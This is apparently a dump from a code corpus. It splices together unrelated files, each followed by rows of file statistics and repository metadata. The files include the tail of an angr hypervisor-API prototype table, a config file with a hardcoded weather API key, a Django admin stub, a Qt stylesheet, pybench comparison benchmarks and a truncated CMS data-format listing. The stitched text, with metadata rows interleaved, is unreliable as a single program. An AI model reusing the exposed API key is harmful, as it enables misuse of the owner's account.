offset=0)}, name="WHV_EMULATOR_CALLBACKS", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Callbacks", "Emulator"]),
#
'WHvEmulatorDestroyEmulator': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Emulator"]),
#
'WHvEmulatorTryIoEmulation': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"ExecutionState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT16": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None"), "_bitfield": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "Reserved2": SimTypeInt(signed=False, label="UInt32"), "Cs": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Rip": SimTypeLongLong(signed=False, label="UInt64"), "Rflags": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_VP_EXIT_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"InstructionByteCount": SimTypeChar(label="Byte"), "Reserved": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 3), "InstructionBytes": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16), "AccessInfo": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "PortNumber": SimTypeShort(signed=False, label="UInt16"), "Reserved2": SimTypeFixedSizeArray(SimTypeShort(signed=False, label="UInt16"), 3), "Rax": SimTypeLongLong(signed=False, label="UInt64"), "Rcx": SimTypeLongLong(signed=False, label="UInt64"), "Rsi": SimTypeLongLong(signed=False, label="UInt64"), "Rdi": SimTypeLongLong(signed=False, label="UInt64"), "Ds": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Es": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None)}, name="WHV_X64_IO_PORT_ACCESS_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Emulator", "Context", "VpContext", "IoInstructionContext", "EmulatorReturnStatus"]),
#
'WHvEmulatorTryMmioEmulation': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"ExecutionState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT16": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None"), "_bitfield": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "Reserved2": SimTypeInt(signed=False, label="UInt32"), "Cs": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Rip": SimTypeLongLong(signed=False, label="UInt64"), "Rflags": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_VP_EXIT_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"InstructionByteCount": SimTypeChar(label="Byte"), "Reserved": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 3), "InstructionBytes": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16), "AccessInfo": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "Gpa": SimTypeLongLong(signed=False, label="UInt64"), "Gva": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_MEMORY_ACCESS_CONTEXT", pack=False, align=None), offset=0), SimTypePointer(SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT32": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Emulator", "Context", "VpContext", "MmioInstructionContext", "EmulatorReturnStatus"]),
}
lib.set_prototypes(prototypes)
| 748.166667 | 15,771 | 0.74413 | 2,458 | 22,445 | 6.670871 | 0.071603 | 0.120754 | 0.175642 | 0.149357 | 0.920534 | 0.894188 | 0.885894 | 0.869305 | 0.864914 | 0.86217 | 0 | 0.027706 | 0.056048 | 22,445 | 29 | 15,772 | 773.965517 | 0.746212 | 0.001247 | 0 | 0 | 0 | 0 | 0.278395 | 0.033516 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.277778 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
558abae7e156a851ecb670162a2fa7638041ef1d | 55 | py | Python | API HOmework/config_2.py | Melow49/Weatherpy-API | 06bbab1dea11522f3f6f619e87eaa0fe8801c781 | [
"MIT"
] | null | null | null | API HOmework/config_2.py | Melow49/Weatherpy-API | 06bbab1dea11522f3f6f619e87eaa0fe8801c781 | [
"MIT"
] | null | null | null | API HOmework/config_2.py | Melow49/Weatherpy-API | 06bbab1dea11522f3f6f619e87eaa0fe8801c781 | [
"MIT"
] | null | null | null | weather_api_key = "aca14197627f0cd52f348a2e828f60b5"
| 13.75 | 52 | 0.854545 | 4 | 55 | 11.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.42 | 0.090909 | 55 | 3 | 53 | 18.333333 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0.603774 | 0.603774 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e978f1a3270d583e21924676297a0f5ad745290b | 186 | py | Python | motherrussiaDjango/mainpage/admin.py | TooManyEyes/mother_russian | b2f3d6c8c7df413c265df441c74ab48aa6cbc380 | [
"MIT"
] | null | null | null | motherrussiaDjango/mainpage/admin.py | TooManyEyes/mother_russian | b2f3d6c8c7df413c265df441c74ab48aa6cbc380 | [
"MIT"
] | null | null | null | motherrussiaDjango/mainpage/admin.py | TooManyEyes/mother_russian | b2f3d6c8c7df413c265df441c74ab48aa6cbc380 | [
"MIT"
] | 1 | 2020-12-28T08:03:01.000Z | 2020-12-28T08:03:01.000Z | from django.contrib import admin
# Register your models here.
from django.contrib import admin
# Register your models here.
from .models import GameMode
admin.site.register(GameMode)
| 18.6 | 32 | 0.801075 | 26 | 186 | 5.730769 | 0.423077 | 0.134228 | 0.228188 | 0.308725 | 0.697987 | 0.697987 | 0.697987 | 0.697987 | 0.697987 | 0.697987 | 0 | 0 | 0.139785 | 186 | 9 | 33 | 20.666667 | 0.93125 | 0.284946 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e9824206e3bb46d28e5e052e48220f57bd74e7ee | 167 | py | Python | lib/third_party/overrides/__init__.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/third_party/overrides/__init__.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/third_party/overrides/__init__.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | from overrides.overrides import overrides
from overrides.final import final
from overrides.overrides import __VERSION__
from overrides.enforce import EnforceOverrides
| 33.4 | 46 | 0.88024 | 20 | 167 | 7.15 | 0.35 | 0.363636 | 0.307692 | 0.391608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095808 | 167 | 4 | 47 | 41.75 | 0.94702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
75d25c5da6f3f818cbcc31f26a214718e3212ccd | 200 | py | Python | src/qtmodernredux/apl_style/windowstyle/frame.py | robertkist/qtmodernredux | c7f791a1492ff855f3e4b963b8e9f20c46ba503f | [
"Apache-2.0"
] | 4 | 2021-04-12T19:30:47.000Z | 2022-02-11T18:24:16.000Z | src/qtmodernredux/apl_style/windowstyle/frame.py | robertkist/qtmodernredux | c7f791a1492ff855f3e4b963b8e9f20c46ba503f | [
"Apache-2.0"
] | null | null | null | src/qtmodernredux/apl_style/windowstyle/frame.py | robertkist/qtmodernredux | c7f791a1492ff855f3e4b963b8e9f20c46ba503f | [
"Apache-2.0"
] | null | null | null | __author__ = "Robert Kist"
frame_style = '''
#windowFrame {
border-radius: {WINDOW_CORNER_RADIUS_PX}px {WINDOW_CORNER_RADIUS_PX}px {WINDOW_CORNER_RADIUS_PX}px {WINDOW_CORNER_RADIUS_PX}px;
}
'''
| 22.222222 | 131 | 0.77 | 28 | 200 | 4.892857 | 0.392857 | 0.350365 | 0.525547 | 0.583942 | 0.642336 | 0.642336 | 0.642336 | 0.642336 | 0.642336 | 0.642336 | 0 | 0 | 0.11 | 200 | 8 | 132 | 25 | 0.769663 | 0 | 0 | 0 | 0 | 0.166667 | 0.805 | 0.545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f94425d3c6c87eee1ded7efe7931b5f9c61dd9c0 | 13,308 | py | Python | pybench/Numbers.py | haypo/pymicrobench | 7c6b92deaf5cf0c3fc965fcfcbc6a78f7d0d10f4 | [
"MIT"
] | 3 | 2018-01-17T18:45:23.000Z | 2020-10-02T06:26:03.000Z | pybench/Numbers.py | vstinner/pymicrobench | 7c6b92deaf5cf0c3fc965fcfcbc6a78f7d0d10f4 | [
"MIT"
] | null | null | null | pybench/Numbers.py | vstinner/pymicrobench | 7c6b92deaf5cf0c3fc965fcfcbc6a78f7d0d10f4 | [
"MIT"
] | 4 | 2018-01-17T18:45:23.000Z | 2020-10-08T15:24:51.000Z | import pyperf
import six
from six.moves import xrange
from pybench import Test
if six.PY3:
long = int
class CompareIntegers(Test):
version = 2.0
operations = 30 * 5
inner_loops = 30
def test(self, loops):
range_it = xrange(loops)
t0 = pyperf.perf_counter()
for _ in range_it:
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
2 < 3
2 > 3
2 == 3
2 > 3
2 < 3
return pyperf.perf_counter() - t0
class CompareFloats(Test):
version = 2.0
operations = 30 * 5
inner_loops = 30
def test(self, loops):
range_it = xrange(loops)
t0 = pyperf.perf_counter()
for _ in range_it:
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
2.1 < 3.31
2.1 > 3.31
2.1 == 3.31
2.1 > 3.31
2.1 < 3.31
return pyperf.perf_counter() - t0
class CompareFloatsIntegers(Test):
version = 2.0
operations = 30 * 5
inner_loops = 30
def test(self, loops):
range_it = xrange(loops)
t0 = pyperf.perf_counter()
for _ in range_it:
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
2.1 < 4
2.1 > 4
2.1 == 4
2.1 > 4
2.1 < 4
return pyperf.perf_counter() - t0
class CompareLongs(Test):
version = 2.0
operations = 30 * 5
inner_loops = 30
def test(self, loops):
a = long(1234567890)
b = long(3456789012345)
range_it = xrange(loops)
t0 = pyperf.perf_counter()
for _ in range_it:
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
a < b
a > b
a == b
a > b
a < b
return pyperf.perf_counter() - t0
| 16.824273 | 41 | 0.190186 | 1,806 | 13,308 | 1.388151 | 0.02381 | 0.23933 | 0.179497 | 0.299162 | 0.928201 | 0.918229 | 0.882329 | 0.882329 | 0.882329 | 0.882329 | 0 | 0.409771 | 0.713931 | 13,308 | 790 | 42 | 16.84557 | 0.248752 | 0 | 0 | 0.981366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006211 | false | 0 | 0.006211 | 0 | 0.043478 | 0 | 0 | 0 | 1 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
f962ea4bcbb09d48fcde935d09644fdd71d25451 | 12,285 | py | Python | Documentation/DataFormats/python/RecoParticleFlow_dataformats.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | Documentation/DataFormats/python/RecoParticleFlow_dataformats.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | Documentation/DataFormats/python/RecoParticleFlow_dataformats.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | '''
Created on Jun 26, 2013
@author: Mantas Stankevicius
@contact: mantas.stankevicius@cern.ch
http://cmsdoxy.web.cern.ch/cmsdoxy/dataformats/
@responsible:
'''
json = {
"full": {
"title": "RecoParticleFlow collections (in RECO and AOD)",
"data": [
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF photon super-clusters"
},
{
"instance": "particleFlowPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF photon super-clusters"
},
{
"instance": "pfElectronTranslator:pf",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF electron super-clusters"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PhotonCollection",
"desc": "photons imported in PF translated into the RECO format"
},
{
"instance": "particleFlow:electrons",
"container": "reco::PFCandidateCollection",
"desc": "Particle Flow Electron Candidates without any selection (refers to reco::PFBlock`s)"
},
{
"instance": "pfElectronTranslator:pf",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of PF-electrons"
},
{
"instance": "pfElectronTranslator:pf",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF electron super-clusters"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "recoPFCandidates",
"desc": "Particle Flow Candidates (refers to reco::PFBlock`s)"
},
{
"instance": "particleFlowBlock",
"container": "recoPFBlocks",
"desc": "No documentation"
},
{
"instance": "particleFlowDisplacedVertex",
"container": "recoPFDisplacedVertexs",
"desc": "No documentation"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlowTmpPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of photons imported in PF"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "trackerDrivenElectronSeeds",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
}
]
},
"aod": {
"title": "RecoParticleFlow collections (in AOD only)",
"data": [
{
"instance": "particleFlowTmpPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PhotonCollection",
"desc": "photons imported in PF translated into the RECO format"
},
{
"instance": "pfPhotonTranslator",
"container": "recoPhotonCores",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator",
"container": "recoConversions",
"desc": "No documentation"
},
{
"instance": "particleFlowPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
